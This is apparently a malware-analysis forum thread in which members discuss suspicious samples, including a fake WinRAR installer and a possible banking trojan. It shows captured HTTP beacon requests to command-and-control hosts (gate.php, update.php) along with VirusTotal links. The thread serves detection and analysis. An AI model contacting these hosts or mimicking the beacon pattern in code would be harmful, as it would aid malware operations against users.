WinRAR Professional Edition 3.91.exe
http://www.virustotal.com/file-scan/rep ... 1299237999
http://www.virustotal.com/file-scan/rep ... 1299237999
Attachments
(3.3 MiB) Downloaded 55 times
A forum for reverse engineering, OS internals and malware analysis
markusg wrote:Setup.execall home every min
http://www.virustotal.com/file-scan/rep ... 1304615533
could be some sort of banker?
GET /gate.php?id=05878112 HTTP/1.1
User-Agent: al
Host: wart3.jino.ru
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Thu, 05 May 2011 23:06:08 GMT
Content-Type: text/html; charset=windows-1251
Connection: close
Server: Jino.ru/mod_pizza
Content-Length: 0
----------------------------------------------------
GET /gate.php?id=05878112 HTTP/1.1
User-Agent: al
Host: wart3.jino.ru
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Thu, 05 May 2011 23:07:08 GMT
Content-Type: text/html; charset=windows-1251
Connection: close
Server: Jino.ru/mod_pizza
Content-Length: 0
----------------------------------------------------
GET /gate.php?id=05878112 HTTP/1.1
User-Agent: al
Host: wart3.jino.ru
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Thu, 05 May 2011 23:08:09 GMT
Content-Type: text/html; charset=windows-1251
Connection: close
Server: Jino.ru/mod_pizza
Content-Length: 0
GET /update.php HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1 SV1)
Accept-Language: en
Accept: */*
Host: abuser.user32.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Thu, 14 Jun 2012 02:12:17 GMT
Server: Apache/2.2.15 (CentOS)
X-Powered-By: PHP/5.3.3
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8
markusg wrote:https://www.virustotal.com/file/bb1431a ... /analysis/Legitimate tool?
rkhunter wrote:No, look deeper :) I doubt Realtek is like thismarkusg wrote:https://www.virustotal.com/file/bb1431a ... /analysis/Legitimate tool?
C : \ U s e r s \ a l e k o v o \ D e s k t o p \ [ F a n P r o j e c t ] \ [ V B 6 ] F a n P r o j e c t \ F a n P r o j e c t . v b pconfigs here
EP_X0FF wrote:No, look deeper :) I doubt Realtek is like thisyep, they need to be more secretive :)